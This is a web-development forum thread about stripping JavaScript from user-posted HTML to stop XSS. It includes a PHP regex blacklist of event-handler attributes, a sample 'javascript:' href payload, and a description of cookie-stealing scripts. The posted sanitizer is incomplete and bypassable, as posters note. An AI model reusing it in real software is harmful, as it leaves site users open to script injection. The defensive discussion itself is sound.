javascript =)
Moderator: General Moderators
javascript =)
Do all javascripts need to be triggered by an event? Such as onLoad, onMouseOver, onMouseOut... etc.
If I replace all of these words with 'bswords' or something similar.. will this effectively disable javascript?
If I replace all of these words with 'bswords' or something similar.. will this effectively disable javascript?
Set Search Time - A google chrome extension. When you search only results from the past year (or set time period) are displayed. Helps tremendously when using new technologies to avoid outdated results.
hmm... this was just my prequisite to the security question. In order to protect against it, i needed to know how it can be delivered 
Edit: I guess this could be switched over to security now =). As a beginning to disabling javascript, I should filter the <script></script> tags. Perhaps strip_tags() would get rid of that. Then I'll replace all of the event words with something (yet to figure that out). Where should I go from there? I'm just trying to get some logic.. in english.. then translate that to code.. later.
Edit: I guess this could be switched over to security now =). As a beginning to disabling javascript, I should filter the <script></script> tags. Perhaps strip_tags() would get rid of that. Then I'll replace all of the event words with something (yet to figure that out). Where should I go from there? I'm just trying to get some logic.. in english.. then translate that to code.. later.
Set Search Time - A google chrome extension. When you search only results from the past year (or set time period) are displayed. Helps tremendously when using new technologies to avoid outdated results.
- Ambush Commander
- DevNet Master
- Posts: 3698
- Joined: Mon Oct 25, 2004 9:29 pm
- Location: New Jersey, US
Here's what I'm thinking.
1. Parse all tags and remove tags not on whitelist (tags not on whitelist include <script></script>). Check tags for well-formedness, make sure the nesting is correct
2. Parse all attribute values to make sure their forms are compliant with the doctype and on your attribute whitelist for a particular tag. So, an A tag would have HREF whitelisted but not ONCLICK. And the attribute parser would make sure that HREF != "javascript:do_evil_stuff"
By the way, if you end up doing all that, could you, like, release the code publicly? It would be a really nice HTML library.
I'm calling for a shoot first, ask questions later policy. Rather than asking yourself what you should get rid of, ask yourself what you should keep. But by doing this, a simple regexp solution will not work.
Ideally... You implement a doctype parser. You then extend that parser to include more restrictions that are not possible in current doctype syntaxes. Then, you build a simplified doctype for what you would consider "secure" (leave out definitions for SCRIPT et cetera). You may need to hardcode extra restrictions. Then, you feed it into a script that parses HTML tags. Allow for some smartness when correcting tags, a Tidy like project. Have the script parse everything, and then have it check it with the doctype. Implement parsers for all RFC definitions, and whitelist those accordingly: this will be used for the attributes.
Of course, this is overkill
But it's still mad cool. X)
1. Parse all tags and remove tags not on whitelist (tags not on whitelist include <script></script>). Check tags for well-formedness, make sure the nesting is correct
2. Parse all attribute values to make sure their forms are compliant with the doctype and on your attribute whitelist for a particular tag. So, an A tag would have HREF whitelisted but not ONCLICK. And the attribute parser would make sure that HREF != "javascript:do_evil_stuff"
By the way, if you end up doing all that, could you, like, release the code publicly? It would be a really nice HTML library.
I'm calling for a shoot first, ask questions later policy. Rather than asking yourself what you should get rid of, ask yourself what you should keep. But by doing this, a simple regexp solution will not work.
Ideally... You implement a doctype parser. You then extend that parser to include more restrictions that are not possible in current doctype syntaxes. Then, you build a simplified doctype for what you would consider "secure" (leave out definitions for SCRIPT et cetera). You may need to hardcode extra restrictions. Then, you feed it into a script that parses HTML tags. Allow for some smartness when correcting tags, a Tidy like project. Have the script parse everything, and then have it check it with the doctype. Implement parsers for all RFC definitions, and whitelist those accordingly: this will be used for the attributes.
Of course, this is overkill
But it's still mad cool. X)
well here's what I got so far.. it might not be as advanced as described above
but it's a start..
Currently it replaces everything from <script... /script> with nothing.
Then replaces javascript event handlers with "badboy".
However I don't think this list is complete.
What would be my next step in removing javascript? Previously the only way I knew how to include javascript was with an event handler.
Currently it replaces everything from <script... /script> with nothing.
Then replaces javascript event handlers with "badboy".
However I don't think this list is complete.
Code: Select all
/* Strip javascript.. or attempt to */
function me_strip_js($string)
{
/* Replace everything between <script></script> tags with nothing */
$string = preg_replace("#<script.+?/script>#ism","",$string);
/* If they didn't place an </script> tag, replace the <script> with nothing */
$string = preg_replace("#<script.+?>#ism","",$string);
/* Replace javascript event handlers that are inside of < >'s */
$string = preg_replace('/(<[^>]*?)\bonabort\b(.+?>)/is', "$1badboy$2", $string);
$string = preg_replace('/(<[^>]*?)\bonblur\b(.+?>)/is', "$1badboy$2", $string);
$string = preg_replace('/(<[^>]*?)\bonchange\b(.+?>)/is', "$1badboy$2", $string);
$string = preg_replace('/(<[^>]*?)\bonclick\b(.+?>)/is', "$1badboy$2", $string);
$string = preg_replace('/(<[^>]*?)\bondblclick\b(.+?>)/is', "$1badboy$2", $string);
$string = preg_replace('/(<[^>]*?)\bondragdrop\b(.+?>)/is', "$1badboy$2", $string);
$string = preg_replace('/(<[^>]*?)\bonerror\b(.+?>)/is', "$1badboy$2", $string);
$string = preg_replace('/(<[^>]*?)\bonfocus\b(.+?>)/is', "$1badboy$2", $string);
$string = preg_replace('/(<[^>]*?)\bonkeydown\b(.+?>)/is', "$1badboy$2", $string);
$string = preg_replace('/(<[^>]*?)\bonkeypress\b(.+?>)/is', "$1badboy$2", $string);
$string = preg_replace('/(<[^>]*?)\bonkeyup\b(.+?>)/is', "$1badboy$2", $string);
$string = preg_replace('/(<[^>]*?)\bonload\b(.+?>)/is', "$1badboy$2", $string);
$string = preg_replace('/(<[^>]*?)\bonmousedown\b(.+?>)/is', "$1badboy$2", $string);
$string = preg_replace('/(<[^>]*?)\bonmousemove\b(.+?>)/is', "$1badboy$2", $string);
$string = preg_replace('/(<[^>]*?)\bonmouseout\b(.+?>)/is', "$1badboy$2", $string);
$string = preg_replace('/(<[^>]*?)\bonmouseover\b(.+?>)/is', "$1badboy$2", $string);
$string = preg_replace('/(<[^>]*?)\bonmouseup\b(.+?>)/is', "$1badboy$2", $string);
$string = preg_replace('/(<[^>]*?)\bonmove\b(.+?>)/is', "$1badboy$2", $string);
$string = preg_replace('/(<[^>]*?)\bonreset\b(.+?>)/is', "$1badboy$2", $string);
$string = preg_replace('/(<[^>]*?)\bonresize\b(.+?>)/is', "$1badboy$2", $string);
$string = preg_replace('/(<[^>]*?)\bonselect\b(.+?>)/is', "$1badboy$2", $string);
$string = preg_replace('/(<[^>]*?)\bonsubmit\b(.+?>)/is', "$1badboy$2", $string);
$string = preg_replace('/(<[^>]*?)\bonunload\b(.+?>)/is', "$1badboy$2", $string);
$string = preg_replace('/(<[^>]*?)\biframe\b(.+?>)/is', "$1badboy$2", $string);
/* Return the result */
return $string;
}Set Search Time - A google chrome extension. When you search only results from the past year (or set time period) are displayed. Helps tremendously when using new technologies to avoid outdated results.
- CoderGoblin
- DevNet Resident
- Posts: 1425
- Joined: Tue Mar 16, 2004 10:03 am
- Location: Aachen, Germany
you can't load an iframe, look at my last regex 
Set Search Time - A google chrome extension. When you search only results from the past year (or set time period) are displayed. Helps tremendously when using new technologies to avoid outdated results.
- CoderGoblin
- DevNet Resident
- Posts: 1425
- Joined: Tue Mar 16, 2004 10:03 am
- Location: Aachen, Germany
- n00b Saibot
- DevNet Resident
- Posts: 1452
- Joined: Fri Dec 24, 2004 2:59 am
- Location: Lucknow, UP, India
- Contact:
- Ambush Commander
- DevNet Master
- Posts: 3698
- Joined: Mon Oct 25, 2004 9:29 pm
- Location: New Jersey, US
You missed the pseudoprotocol javascript.
Code: Select all
<a href="javascript:do_some_badstuff();">Don't click here!</a>- n00b Saibot
- DevNet Resident
- Posts: 1452
- Joined: Fri Dec 24, 2004 2:59 am
- Location: Lucknow, UP, India
- Contact:
- Ambush Commander
- DevNet Master
- Posts: 3698
- Joined: Mon Oct 25, 2004 9:29 pm
- Location: New Jersey, US
- Ambush Commander
- DevNet Master
- Posts: 3698
- Joined: Mon Oct 25, 2004 9:29 pm
- Location: New Jersey, US
JavaScript, being a programming language, can be exploited easily. While webbrowsers try to do the best they can to prevent the writer of the system from abusing the user (such as preventing write access to a file upload field), it cannot protect a website from itself.
JavaScript has the ability to read and write cookies, as well as the ability to transmit their contents. Say I have a webpage that allows arbitrary HTML to be posted on it. An attacker could concievably post a JavaScript snippet that would send the contents of all cookies to the attacker, and thus an XSS attack. They could make an infinite loop on a modal dialogue, and render the browser useless (if you do while(true) alert('Haha!'); on Firefox, there is no way to abort except by using the Task Manager). You'd have to be a fool to allow user-submitted JavaScript on pages that are accessible by everyone.
There are notable exceptions. Wikipedia, for instance, offers a page called monobook.js to it's users. Only the owner of this page is allowed to edit it, and the JavaScript written there is automatically included in their page when they are logged in, but don't affect anyone else. When no one but the attacker can see the JavaScript, there is no security hole. If people are writing content for the masses, they can publish it without moderation (you can always try auditing JavaScript code for things that specifically need it), and they can use JavaScript, that's a security hole.
JavaScript has the ability to read and write cookies, as well as the ability to transmit their contents. Say I have a webpage that allows arbitrary HTML to be posted on it. An attacker could concievably post a JavaScript snippet that would send the contents of all cookies to the attacker, and thus an XSS attack. They could make an infinite loop on a modal dialogue, and render the browser useless (if you do while(true) alert('Haha!'); on Firefox, there is no way to abort except by using the Task Manager). You'd have to be a fool to allow user-submitted JavaScript on pages that are accessible by everyone.
There are notable exceptions. Wikipedia, for instance, offers a page called monobook.js to it's users. Only the owner of this page is allowed to edit it, and the JavaScript written there is automatically included in their page when they are logged in, but don't affect anyone else. When no one but the attacker can see the JavaScript, there is no security hole. If people are writing content for the masses, they can publish it without moderation (you can always try auditing JavaScript code for things that specifically need it), and they can use JavaScript, that's a security hole.